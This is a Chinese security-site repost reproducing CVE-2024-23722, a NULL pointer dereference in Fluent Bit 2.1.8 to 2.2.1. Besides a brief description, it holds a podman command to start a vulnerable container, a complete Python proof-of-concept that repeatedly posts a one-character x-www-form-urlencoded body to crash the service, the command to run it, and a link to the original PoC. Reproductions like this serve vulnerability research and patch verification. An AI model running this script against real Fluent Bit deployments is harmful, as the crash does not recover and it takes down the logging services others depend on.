CVE-2024-23722

admin 2024年5月2日06:27:40评论32 views字数 1089阅读3分37秒阅读模式

漏洞描述

在Fluent Bit 2.1.8到2.2.1中,可以通过内容类型为x-www-form-urlencoded的无效HTTP负载引起NULL指针解引用。它崩溃并且不重新启动。

资产测绘

FOFA:

漏洞复现

 

podman run -p8888:8888 -ti cr.fluentbit.io/fluent/fluent-bit:2.2.0 -t http -p port=8888 -o stdout

import requests
import time
import sys
def check_port(url):
    try:
        with requests.head(url):
            return True
    except requests.exceptions.ConnectionError:
        return False

def send_request_every_second(url):
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    data = 'A'  # The body is now just the letter 'A'

    while True:
        if not check_port(url):
            print("port is currently not open")
            time.sleep(1)
            continue
        try:
            response = requests.post(url, headers=headers, data=data)
            print(f"Status Code: {response.status_code}, Response: {response.text} server does not seem exploitable")
        except requests.exceptions.ConnectionError:
            print("Server might have crashed")
        time.sleep(1)  # Wait for 1 second before sending the next request

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: script.py <URL>")
    else:
        url = sys.argv[1]
        send_request_every_second(url)

python3 exploit.py http://127.0.0.1:8888

https://github.com/alexcote1/CVE-2024-23722-poc?tab=readme-ov-file

原文始发于微信公众号(漏洞文库):【漏洞复现】CVE-2024-23722

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月2日06:27:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-23722https://cn-sec.com/archives/2701429.html

发表评论

匿名网友 填写信息